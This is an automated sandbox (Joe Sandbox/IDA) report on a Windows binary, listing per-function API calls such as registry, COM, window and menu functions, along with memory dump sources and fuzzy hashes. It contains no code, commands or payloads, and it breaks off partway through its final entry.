                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: dc2189050cbdb5aa5bce2e60524992683d487d756271abd56fbde5c7ff782739
                                                    • Instruction ID: 7f634d9af07dfb3fb510e27c1566172773c84db0cf47c6dead0af52add96be85
                                                    • Opcode Fuzzy Hash: dc2189050cbdb5aa5bce2e60524992683d487d756271abd56fbde5c7ff782739
                                                    • Instruction Fuzzy Hash: BC51D172600216ABDB268F64CC82EAB7BE9EB42754F164629FC15DE150EB34FC44C691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039C53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 0039D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039C00D,?,?), ref: 0039D314
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D350
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3C7
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3FD
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039C629
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039C684
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039C6C9
                                                    • RegEnumValueW.ADVAPI32 ref: 0039C6F8
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0039C752
                                                    • RegCloseKey.ADVAPI32(?), ref: 0039C75E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                    • String ID:
                                                    • API String ID: 1120388591-0
                                                    • Opcode ID: dfa64c90e113fb36157deeb4c08f9def73f69fd69f3d339172223d1a78eb88d3
                                                    • Instruction ID: 581656e860d44dacc6b5ecbd50e1b17282edffafeba34f3c1aef970d78bb1164
                                                    • Opcode Fuzzy Hash: dfa64c90e113fb36157deeb4c08f9def73f69fd69f3d339172223d1a78eb88d3
                                                    • Instruction Fuzzy Hash: 8F81A131118241AFD716DF24C885E6ABBE5FF84308F14555CF4854B2A2DB31ED45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000035), ref: 00370049
                                                    • SysAllocString.OLEAUT32(00000000), ref: 003700F0
                                                    • VariantCopy.OLEAUT32(003702F4,00000000), ref: 00370119
                                                    • VariantClear.OLEAUT32(003702F4), ref: 0037013D
                                                    • VariantCopy.OLEAUT32(003702F4,00000000), ref: 00370141
                                                    • VariantClear.OLEAUT32(?), ref: 0037014B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                    • String ID:
                                                    • API String ID: 3859894641-0
                                                    • Opcode ID: 89138f8c4ced92b34262beaea1ebbb90054f0885f7ee6a3650af4af9f1fe08c3
                                                    • Instruction ID: 3f6d276f5de8bf1b7c933fe4e19ec1ef101279bda6cf2d2576347ed7b82fc684
                                                    • Opcode Fuzzy Hash: 89138f8c4ced92b34262beaea1ebbb90054f0885f7ee6a3650af4af9f1fe08c3
                                                    • Instruction Fuzzy Hash: 94510835640310EACF3AAB74D895B29B3A8EF0A310F14D447E90ADF296DB789C40CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00386DE8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00386E36
                                                    • CoInitialize.OLE32(00000000), ref: 00386F93
                                                    • CoCreateInstance.OLE32(003B0CC4,00000000,00000001,003B0B34,?), ref: 00386FAA
                                                    • CoUninitialize.OLE32 ref: 0038722E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: c223cdb48496736e0f5d8c70bd34853ca1c580e9b567208dc22ce3efdb1e9852
                                                    • Instruction ID: c6d55a6888e291d802cf265057faf1db910ec0ad6a953da5399b2fe2d5ab8f83
                                                    • Opcode Fuzzy Hash: c223cdb48496736e0f5d8c70bd34853ca1c580e9b567208dc22ce3efdb1e9852
                                                    • Instruction Fuzzy Hash: 71D14771608301AFC30AEF24C881DABB7E8EF98704F54495DF5958B2A1DB71ED45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A8B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0036FB8F,00000000,?,?,00000000,?,003539BC,00000004,00000000,00000000), ref: 003A8BAB
                                                    • EnableWindow.USER32(?,00000000), ref: 003A8BD1
                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003A8C30
                                                    • ShowWindow.USER32(?,00000004), ref: 003A8C44
                                                    • EnableWindow.USER32(?,00000001), ref: 003A8C6A
                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003A8C8E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 35bc5dc2da56fc3434c6ed70476980ecf6354a9893e1d8f58c77fc047b3f01d7
                                                    • Instruction ID: 0b9d6260abfae43cc2fc4fd30f915b1e8a34a365936bfbb92969e459d3450f94
                                                    • Opcode Fuzzy Hash: 35bc5dc2da56fc3434c6ed70476980ecf6354a9893e1d8f58c77fc047b3f01d7
                                                    • Instruction Fuzzy Hash: FB417374601244AFDB2BCF24D889FA57BE4FB4B314F195269E5094F2A2CB31A851CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00392C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00392C45
                                                      • Part of subcall function 0038EE49: GetWindowRect.USER32 ref: 0038EE61
                                                    • GetDesktopWindow.USER32 ref: 00392C6F
                                                    • GetWindowRect.USER32 ref: 00392C76
                                                    • mouse_event.USER32 ref: 00392CB2
                                                    • GetCursorPos.USER32(?,?,?,?,?,00000000), ref: 00392CDE
                                                    • mouse_event.USER32 ref: 00392D3C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                    • String ID:
                                                    • API String ID: 2387181109-0
                                                    • Opcode ID: 2766d9940050162c2c1be08e67cc7f06efce9ddaab110cf6fd6f2822025614bb
                                                    • Instruction ID: 6521d74f690cdfc56a1e07ba83c18d1f558fca663cfa911c1808776792e148f4
                                                    • Opcode Fuzzy Hash: 2766d9940050162c2c1be08e67cc7f06efce9ddaab110cf6fd6f2822025614bb
                                                    • Instruction Fuzzy Hash: 8531DE72505715AFDB22DF14D849B9FB7A9FF85354F00091AF889A7291DB30EA08CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00386178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                    • _wcslen.LIBCMT ref: 003861D5
                                                    • CoInitialize.OLE32(00000000), ref: 003862EF
                                                    • CoCreateInstance.OLE32(003B0CC4,00000000,00000001,003B0B34,?), ref: 00386308
                                                    • CoUninitialize.OLE32 ref: 00386326
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 3172280962-24824748
                                                    • Opcode ID: f909175e39cf6fa9d03d2ab40d89be5196813eb11eee0bcf10e52618faa9322d
                                                    • Instruction ID: 78dff585f99c5f0e0b5c22f6c2ff87f1dfad26bf48aaf9722cc34f696cdcd223
                                                    • Opcode Fuzzy Hash: f909175e39cf6fa9d03d2ab40d89be5196813eb11eee0bcf10e52618faa9322d
                                                    • Instruction Fuzzy Hash: 1BD152756043109FC71AEF24C481A6ABBE6FF89714F15889DF8869B361CB31EC45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037210F
                                                    • UnloadUserProfile.USERENV(?,?), ref: 0037211B
                                                    • CloseHandle.KERNEL32(?), ref: 00372124
                                                    • CloseHandle.KERNEL32(?), ref: 0037212C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00372135
                                                    • HeapFree.KERNEL32(00000000), ref: 0037213C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: c1355b318b7b54a862386cb721d90c9995cf60ccf23551bc6db1be18dc207bcc
                                                    • Instruction ID: 10d49a955ba826bd10d2f568b8b58c3416a14d2f6c9e5e97bd7474ec86b8bbaf
                                                    • Opcode Fuzzy Hash: c1355b318b7b54a862386cb721d90c9995cf60ccf23551bc6db1be18dc207bcc
                                                    • Instruction Fuzzy Hash: C9E0E576104101BBDB421FA1ED0C94ABF3DFF4A322F104220F226828B0DB369421DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037CD90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00314154: _wcslen.LIBCMT ref: 00314159
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0037CEAE
                                                    • _wcslen.LIBCMT ref: 0037CEF5
                                                    • SetMenuItemInfoW.USER32 ref: 0037CF5C
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0037CF8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                    • String ID: 0
                                                    • API String ID: 1227352736-4108050209
                                                    • Opcode ID: 00fe50738247e42db2b56c12866374b3382c0960bd32830d0c9f28ac071cad9b
                                                    • Instruction ID: 68021a22ef6f3d9a6e91e790fe8a37d4ca34842268ccd07c5027087b987c75ff
                                                    • Opcode Fuzzy Hash: 00fe50738247e42db2b56c12866374b3382c0960bd32830d0c9f28ac071cad9b
                                                    • Instruction Fuzzy Hash: EE51E0716243009BD737DF28C884BABB7E9AF89310F059A2DF899D62D0DB68CD44C752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A46DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A4794
                                                    • IsMenu.USER32 ref: 003A47A9
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A47F1
                                                    • DrawMenuBar.USER32 ref: 003A4804
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID: 0
                                                    • API String ID: 3076010158-4108050209
                                                    • Opcode ID: fc610e1f6ac26ec93cb2b53891c230df55ea2799a2157f88b0a3f37c5f394001
                                                    • Instruction ID: 20c6c83c9122fdd65f56db58588156871c4785c2d44eb2b189a2349fb907092e
                                                    • Opcode Fuzzy Hash: fc610e1f6ac26ec93cb2b53891c230df55ea2799a2157f88b0a3f37c5f394001
                                                    • Instruction Fuzzy Hash: 31415B75A01249EFDB22CF54E884EAABBB8FF8A314F054129F9159B250C7B5ED50CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003726F6
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00372709
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00372739
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2081771294-1403004172
                                                    • Opcode ID: a228a8959d746519baca9950c6c163d4472df73fb9f6ed5b7f4546c5e67de5bf
                                                    • Instruction ID: 3b13049f8d50d723793dd9a491bd85514216792f8570e71b47fcc13201e225aa
                                                    • Opcode Fuzzy Hash: a228a8959d746519baca9950c6c163d4472df73fb9f6ed5b7f4546c5e67de5bf
                                                    • Instruction Fuzzy Hash: 6B212671900104BFDB2EABA4D886DFFB778DF4A360F148119F466AB1E1DB3C494A8610
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036E71E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32 ref: 0036E72B
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0036E73D
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0036E763
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                    • API String ID: 145871493-2590602151
                                                    • Opcode ID: 71a7ba7ca447ba07c595a1942ff522503052d7f386c8f95d4f1f936055fd9977
                                                    • Instruction ID: 5bb44528d0503337e395aef973fdd3a9c51c4613aa16c121f155c907b1172cc4
                                                    • Opcode Fuzzy Hash: 71a7ba7ca447ba07c595a1942ff522503052d7f386c8f95d4f1f936055fd9977
                                                    • Instruction Fuzzy Hash: 27F02B7D801520DFDBB31B208C48AE9362C6F11700F154495F883E6464EF30CC4CCB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00316332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 0031633E
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00316350
                                                    • FreeLibrary.KERNEL32(00000000,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316362
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 145871493-3689287502
                                                    • Opcode ID: 940a79f2f835271ef176a489e3b633d6675269cd027fe38c599b58f15df38932
                                                    • Instruction ID: c5600a577188d90acccce4ecc1815f12c134d2ced9093137da48002cdc2d6469
                                                    • Opcode Fuzzy Hash: 940a79f2f835271ef176a489e3b633d6675269cd027fe38c599b58f15df38932
                                                    • Instruction Fuzzy Hash: C4E08636601B2117925317557C09ADA661D9F87B22B070115F903D2220DB60CD4280B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003162FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316304
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00316316
                                                    • FreeLibrary.KERNEL32(00000000,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316329
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 145871493-1355242751
                                                    • Opcode ID: 327840e62d74b0b0bd5064483f594072601c8e846dba0e81b0abd076c3fc0a94
                                                    • Instruction ID: 81c28f45c19aee4bcb8b19f67e80ed4e65534b2351eb8f81be1ed9d9459874c5
                                                    • Opcode Fuzzy Hash: 327840e62d74b0b0bd5064483f594072601c8e846dba0e81b0abd076c3fc0a94
                                                    • Instruction Fuzzy Hash: 66D0123A6425215742672765BC199CE7E19DE8FB213460519F813A2538CF60CD418590
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039ACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32 ref: 0039AD86
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0039AD94
                                                    • GetProcessIoCounters.KERNEL32 ref: 0039ADC7
                                                    • CloseHandle.KERNEL32(?), ref: 0039AF9C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                    • String ID:
                                                    • API String ID: 3488606520-0
                                                    • Opcode ID: ac7d5674ebf59211d234f1c8a07fa48e2c900c07874a44c2512164efe7f72126
                                                    • Instruction ID: da6ace7800217232bdbc713ac0c9a544963179bb7263007add0ba775e9dccafc
                                                    • Opcode Fuzzy Hash: ac7d5674ebf59211d234f1c8a07fa48e2c900c07874a44c2512164efe7f72126
                                                    • Instruction Fuzzy Hash: 69A1C1B5604700AFD725DF28C886F2AB7E5AF48710F14891DF95A9B2D2DB71EC40CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039C328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 0039D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039C00D,?,?), ref: 0039D314
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D350
